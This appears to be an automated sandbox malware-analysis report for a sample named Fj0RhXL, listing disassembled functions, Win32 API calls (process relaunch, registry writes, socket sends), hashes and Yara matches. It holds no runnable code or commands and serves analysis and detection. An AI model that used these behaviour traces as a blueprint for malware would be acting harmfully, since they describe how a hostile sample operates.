                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: DecodePointer__invoke_watson
                                          • String ID: HK7l$PNv
                                          • API String ID: 4034010525-3572412945
                                          • Opcode ID: 82e29a2328bc8ad192febc71234a102e7f71b9ed9e0902d969dc9b2f845db7c2
                                          • Instruction ID: 5b0ac59bb9c1898883925bb05699912f90304b0a80d2bcfd7a6044d9e4f182d5
                                          • Opcode Fuzzy Hash: 82e29a2328bc8ad192febc71234a102e7f71b9ed9e0902d969dc9b2f845db7c2
                                          • Instruction Fuzzy Hash: 85E0EC72110609BBDF021F61CD099AA3F7AEB44290B560810FE24C1530D737D834DB92
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Message_sprintf
                                          • String ID: %s Error$Astrolog
                                          • API String ID: 997493000-1827282765
                                          • Opcode ID: 41a28cfafc5ebccb8a8684a0edf5737526973cffbf79abfe5558c6dd2cd098da
                                          • Instruction ID: c0e0505dfbd803e0b28e17c07bcb3cd32286c036d4b50afd35fde361dbfa1e9e
                                          • Opcode Fuzzy Hash: 41a28cfafc5ebccb8a8684a0edf5737526973cffbf79abfe5558c6dd2cd098da
                                          • Instruction Fuzzy Hash: 13E01B71A0014CABCF00FFA0C955F9DB7BCEB0535CF504526A90697544DF749608CA91
                                          APIs
                                            • Part of subcall function 03D975E0: GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 03D97602
                                            • Part of subcall function 03D975E0: GetCommandLineW.KERNEL32 ref: 03D97608
                                            • Part of subcall function 03D975E0: GetStartupInfoW.KERNEL32(?), ref: 03D97617
                                            • Part of subcall function 03D975E0: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 03D9763F
                                            • Part of subcall function 03D975E0: ExitProcess.KERNEL32 ref: 03D97647
                                          • RegCreateKeyW.ADVAPI32(80000001,end,?), ref: 03D960E2
                                          • RegCloseKey.ADVAPI32(?), ref: 03D960ED
                                          • ExitProcess.KERNEL32 ref: 03D960F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CreateExit$CloseCommandFileInfoLineModuleNameStartup
                                          • String ID: end
                                          • API String ID: 110310128-16528305
                                          • Opcode ID: 7315c842559d7cebbf62c1aec7821cae563569f3c6ae847309d788f22ca42270
                                          • Instruction ID: 99600ace05e7a9cc4db5fc51be92081f44d526e9d8eb4e29a7d9fea501a74195
                                          • Opcode Fuzzy Hash: 7315c842559d7cebbf62c1aec7821cae563569f3c6ae847309d788f22ca42270
                                          • Instruction Fuzzy Hash: C0D0C973154200EFD344FBA09C09E6976A8FB4C302F00090DB64A91244EA64D114CB32
                                          APIs
                                          • std::locale::_Init.LIBCPMT ref: 03BF6C04
                                            • Part of subcall function 03C098B5: __EH_prolog3.LIBCMT ref: 03C098BC
                                            • Part of subcall function 03C098B5: std::_Lockit::_Lockit.LIBCPMT ref: 03C098D2
                                            • Part of subcall function 03C098B5: std::locale::_Locimp::_Locimp.LIBCPMT ref: 03C098F4
                                            • Part of subcall function 03C098B5: std::locale::_Setgloballocale.LIBCPMT ref: 03C098FE
                                            • Part of subcall function 03C098B5: _Yarn.LIBCPMT ref: 03C09914
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03BF6C1C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3bf0000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn
                                          • String ID:
                                          • API String ID: 3373505166-0
                                          • Opcode ID: b65b271b494c4bdb6a9882e652c4900f524fc060c0e14a268b26a88efb3d2cc3
                                          • Instruction ID: 2a0fac9cdc235c4cfc6f0939f48b54d181f540b1ea360a4a29f30480c7734098
                                          • Opcode Fuzzy Hash: b65b271b494c4bdb6a9882e652c4900f524fc060c0e14a268b26a88efb3d2cc3
                                          • Instruction Fuzzy Hash: A1F137B19083809FD330DF68C884B9BFBE9FF88304F44496DE6998B251DB359948CB52
                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 03D983E8
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 03D984B8
                                          • SetLastError.KERNEL32(0000007F), ref: 03D984E3
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Read$ErrorLast
                                          • String ID:
                                          • API String ID: 2715074504-0
                                          • Opcode ID: a8ccd7a380f6d7705ef96936502d643a5bb45e55e647a5681de1b8c24c1f2b43
                                          • Instruction ID: ab14f57160c8794f8294694ba2964077ed8899d27671a447473a153897c6e5c3
                                          • Opcode Fuzzy Hash: a8ccd7a380f6d7705ef96936502d643a5bb45e55e647a5681de1b8c24c1f2b43
                                          • Instruction Fuzzy Hash: 83418D71A00205DBEB10CFA9D880E6AF7FAFF89B14F18859AD84997351D770F901DB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __calloc_crt__init_pointers__mtterm
                                          • String ID:
                                          • API String ID: 2478854527-0
                                          • Opcode ID: 8315b22f45023724a3aeb3454028aff8aaf33b483d7882c0affb14de7f68ae95
                                          • Instruction ID: 83755df0d7ee8c22c0b150c16db6be7b7a8bf8fc5d332df361b33d821811a500
                                          • Opcode Fuzzy Hash: 8315b22f45023724a3aeb3454028aff8aaf33b483d7882c0affb14de7f68ae95
                                          • Instruction Fuzzy Hash: CA314D35850B21EFE721EB798C88B8A7EB6EB453A17188126E914DB270FB71C4C0CF50
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03DABB16
                                          • __isleadbyte_l.LIBCMT ref: 03DABB49
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 03DABB7A
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 03DABBE8
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: f8e2f22377ea6af1c15580b33c930c5f7683dbbb737d982e4a6be640df44ebd0
                                          • Instruction ID: 35b8e407d2b81aefe29d225858cb2f5fffd8013df5ab8049f5f101fbc64ea9f6
                                          • Opcode Fuzzy Hash: f8e2f22377ea6af1c15580b33c930c5f7683dbbb737d982e4a6be640df44ebd0
                                          • Instruction Fuzzy Hash: 4531B431A04645EFDB22DF68C984ABE7BF5FF01310F1949AAE4919B199E330D942DB50
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02F0E569
                                          • __isleadbyte_l.LIBCMT ref: 02F0E59C
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02F0E5CD
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02F0E63B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 95c3c4bb14a798fe2796c93eded0783b2f311146c921d5270ca5afdd8ca50992
                                          • Instruction ID: 024cf4ee0b68d2b7f102fb4b9f5163b5f609d66035ca892ac554e69ee7000ea0
                                          • Opcode Fuzzy Hash: 95c3c4bb14a798fe2796c93eded0783b2f311146c921d5270ca5afdd8ca50992
                                          • Instruction Fuzzy Hash: 6031A032A10256EFCF20DFA4C8D4ABE7BA1AF01294B158D68E665DB2D1E730D940EB50
                                          APIs
                                          • SetLastError.KERNEL32(0000139F), ref: 03D8441C
                                            • Part of subcall function 03D813B0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 03D813DB
                                            • Part of subcall function 03D81310: _memmove.LIBCMT ref: 03D81331
                                            • Part of subcall function 03D84210: EnterCriticalSection.KERNEL32(03D84F95,03D84E35,03D842EE,00000000,?,?,03D84E35,?,?,?,?,00000000,000000FF), ref: 03D84218
                                            • Part of subcall function 03D84210: LeaveCriticalSection.KERNEL32(03D84F95,?,?,?,00000000,000000FF), ref: 03D84226
                                            • Part of subcall function 03D84C50: HeapFree.KERNEL32(?,00000000,?,00000000,03D84E35,?,03D842F8,03D84E35,00000000,?,?,03D84E35,?), ref: 03D84C77
                                          • SetLastError.KERNEL32(00000000,?), ref: 03D84407
                                          • SetLastError.KERNEL32(00000057), ref: 03D84431
                                          • WSAGetLastError.WS2_32(?), ref: 03D84440
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave_memmove
                                          • String ID:
                                          • API String ID: 3765754631-0
                                          • Opcode ID: 58adbc943fb11cb69b7a873e25b5f4fc4ec33ecf6eab4f9ce07e67240f4ed7ec
                                          • Instruction ID: 6c6b23d7118aec60b509cc7869b2765f4feb6b32ad74a4b3229197b03c4ae162
                                          • Opcode Fuzzy Hash: 58adbc943fb11cb69b7a873e25b5f4fc4ec33ecf6eab4f9ce07e67240f4ed7ec
                                          • Instruction Fuzzy Hash: 4111A337A05118DBC710FF7AF8849DEB7A8EB84732B0506AAED0CD7300E631A90146E1
                                          APIs
                                          • SetLastError.KERNEL32(0000139F), ref: 02F043DC
                                            • Part of subcall function 02F013A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02F013CB
                                            • Part of subcall function 02F041D0: EnterCriticalSection.KERNEL32(02F04F85,02F04E25,02F042AE,00000000,?,?,02F04E25,?,?,?,?,00000000,000000FF), ref: 02F041D8
                                            • Part of subcall function 02F041D0: LeaveCriticalSection.KERNEL32(02F04F85,?,?,?,00000000,000000FF), ref: 02F041E6
                                            • Part of subcall function 02F04C40: HeapFree.KERNEL32(?,00000000,?,00000000,02F04E25,?,02F042B8,02F04E25,00000000,?,?,02F04E25,?), ref: 02F04C67
                                          • SetLastError.KERNEL32(00000000,?), ref: 02F043C7
                                          • SetLastError.KERNEL32(00000057), ref: 02F043F1
                                          • WSAGetLastError.WS2_32(?), ref: 02F04400
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                          • String ID:
                                          • API String ID: 2060118545-0
                                          • Opcode ID: c4a5587b3728ce908a5516a2bef07649f6533710e75f84f13e36df5bb138704e
                                          • Instruction ID: 51a599da012f1bec40f6ffc276af0ff7e27f5bdbd994a7fba993278ca5202c66
                                          • Opcode Fuzzy Hash: c4a5587b3728ce908a5516a2bef07649f6533710e75f84f13e36df5bb138704e
                                          • Instruction Fuzzy Hash: 69112332E0101C9B8B10EEA9B8C05EEF7A8EBC83A2B4501AAEE0CD7240D73498115AD0
                                          APIs
                                          • _free.LIBCMT ref: 03D8BC1F
                                            • Part of subcall function 03D9AB04: RtlFreeHeap.NTDLL(00000000,00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB1A
                                            • Part of subcall function 03D9AB04: GetLastError.KERNEL32(00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000), ref: 03D9AB2C
                                          • _free.LIBCMT ref: 03D8BC48
                                          • _free.LIBCMT ref: 03D8BC61
                                          • _free.LIBCMT ref: 03D8BC7F
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 922e0244e090425e47e1e8106d69cc3ed9408b4bb472ad80454e335cdc804d83
                                          • Instruction ID: e97fcba7340fe0bc179200cc0b69cac8d68e5cd815b59f1a2897aa73d57e88da
                                          • Opcode Fuzzy Hash: 922e0244e090425e47e1e8106d69cc3ed9408b4bb472ad80454e335cdc804d83
                                          • Instruction Fuzzy Hash: B3112EBB91173097DF22EF649880D6BB368EE85E28709455AED086F309DA34F81187F1
                                          APIs
                                          • _free.LIBCMT ref: 03D98A13
                                          • _free.LIBCMT ref: 03D98A55
                                          • GetProcessHeap.KERNEL32(00000000,00000000,03D98815), ref: 03D98A7C
                                          • HeapFree.KERNEL32(00000000), ref: 03D98A83
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap_free$FreeProcess
                                          • String ID:
                                          • API String ID: 1072109031-0
                                          • Opcode ID: c19cc7b27d6354e0f617b6f9ebff13baf22c9938cdff57f00fb241960bb118f6
                                          • Instruction ID: 8e079032183ad32acac3002b5e8a4e4b89423a6b94c95fb78e9196ae6d181593
                                          • Opcode Fuzzy Hash: c19cc7b27d6354e0f617b6f9ebff13baf22c9938cdff57f00fb241960bb118f6
                                          • Instruction Fuzzy Hash: AA1130726407009BEB30DA65CC45F67B3E5BB85B10F18891DE59A87A80D774F842DB61
                                          APIs
                                          • WSAEventSelect.WS2_32(?,03D83A8B,00000023), ref: 03D83BD2
                                          • WSAGetLastError.WS2_32 ref: 03D83BDD
                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 03D83C28
                                          • WSAGetLastError.WS2_32 ref: 03D83C33
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EventSelectsend
                                          • String ID:
                                          • API String ID: 259408233-0
                                          • Opcode ID: 08772e0fb81ee13a2a2aa578cc98d211f34ed6fb7f79c16cf0f9738379257131
                                          • Instruction ID: a4180f831977df8a17b48d35c19fb06630163a414b68a1e74e1eb63c81f8f29e
                                          • Opcode Fuzzy Hash: 08772e0fb81ee13a2a2aa578cc98d211f34ed6fb7f79c16cf0f9738379257131
                                          • Instruction Fuzzy Hash: 171112BA6007009BD364EF79D988A57B6E9FB84B10F100A1DF55ACB780D775F4008B60
                                          APIs
                                          • WSAEventSelect.WS2_32(?,02F03AAB,00000023), ref: 02F03BF2
                                          • WSAGetLastError.WS2_32 ref: 02F03BFD
                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 02F03C48
                                          • WSAGetLastError.WS2_32 ref: 02F03C53
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EventSelectsend
                                          • String ID:
                                          • API String ID: 259408233-0
                                          • Opcode ID: 940837e6087146f258fb5bfab7b9f35c540966155ee2ead6ff868b0d76210900
                                          • Instruction ID: 1c7892f1eafb2854dd1454dad6066d2a6cc26d09ff586f7f0745d9e9ab2d0370
                                          • Opcode Fuzzy Hash: 940837e6087146f258fb5bfab7b9f35c540966155ee2ead6ff868b0d76210900
                                          • Instruction Fuzzy Hash: B7115AB6A007009BD3209F79DCC8A57B6E9FBC8764F914A2DE657C7680D771E440AB50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction ID: 92eceebc9536e7a6da37375bdd196c38bbf0cddb149cc0de6504c8e5bb2a0762
                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction Fuzzy Hash: EE11807601054EBBCF129E88CD05CEE3F22FB09660F488424FE289A030D736C6B1EB91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction ID: 2f8d6bd827806290fb32754d189529542191515aae32ad1e252f9de13ae617ff
                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction Fuzzy Hash: 22115E3642024EBBCF129E84EC41CEE3F76BF183A4F4A8415FA2859131D376C5B1AB81
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction ID: 148abf8443aea4dab135ecb0e8c4be4eecd1d15feb3ac7e7d1f659a594b561e2
                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction Fuzzy Hash: 6A113D3680014ABBCF225E84DD818EE3F26BB58398B598515FE18594B1DB36C5B1BB81
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                          • Instruction ID: de016f36997c0e1fdd04d3a0625643577a91c3a9062a9ba9c0c7c043fb920a39
                                          • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                          • Instruction Fuzzy Hash: BA117B7240019EBBCF125E84CC41CEE3F26BB4E298B158416FA6858536D737C9B5AF82
                                          APIs
                                          • EnterCriticalSection.KERNEL32(03D84F95,03D84E35,03D842EE,00000000,?,?,03D84E35,?,?,?,?,00000000,000000FF), ref: 03D84218
                                          • LeaveCriticalSection.KERNEL32(03D84F95,?,?,?,00000000,000000FF), ref: 03D84226
                                          • LeaveCriticalSection.KERNEL32(03D84F95), ref: 03D84287
                                          • SetEvent.KERNEL32(8520468B), ref: 03D842A2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterEvent
                                          • String ID:
                                          • API String ID: 3394196147-0
                                          • Opcode ID: 33f2bfdab1cc29bd93cdc859e3ade4394c5bb839ca9ec493ad95fca294b78c03
                                          • Instruction ID: 3f1336e7e0c480f132c293cc7897bce8490c9a9e2a9a526fe2e05ce646001030
                                          • Opcode Fuzzy Hash: 33f2bfdab1cc29bd93cdc859e3ade4394c5bb839ca9ec493ad95fca294b78c03
                                          • Instruction Fuzzy Hash: 0B11F2B2605B06DFD724DF75C584A96B7F9BF88700B14896DE5AA87210EB30EA01CB00
                                          APIs
                                          • EnterCriticalSection.KERNEL32(02F04F85,02F04E25,02F042AE,00000000,?,?,02F04E25,?,?,?,?,00000000,000000FF), ref: 02F041D8
                                          • LeaveCriticalSection.KERNEL32(02F04F85,?,?,?,00000000,000000FF), ref: 02F041E6
                                          • LeaveCriticalSection.KERNEL32(02F04F85), ref: 02F04247
                                          • SetEvent.KERNEL32(8520468B), ref: 02F04262
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterEvent
                                          • String ID:
                                          • API String ID: 3394196147-0
                                          • Opcode ID: 85429b2142bfe7b6a9488494d76163f8488ca27869003a5a64eb37c5f03f4c02
                                          • Instruction ID: 990b9a1faa7ac74fbec3d5ee981d6004d5290eff9eee6a7a6ff1101e95230bf8
                                          • Opcode Fuzzy Hash: 85429b2142bfe7b6a9488494d76163f8488ca27869003a5a64eb37c5f03f4c02
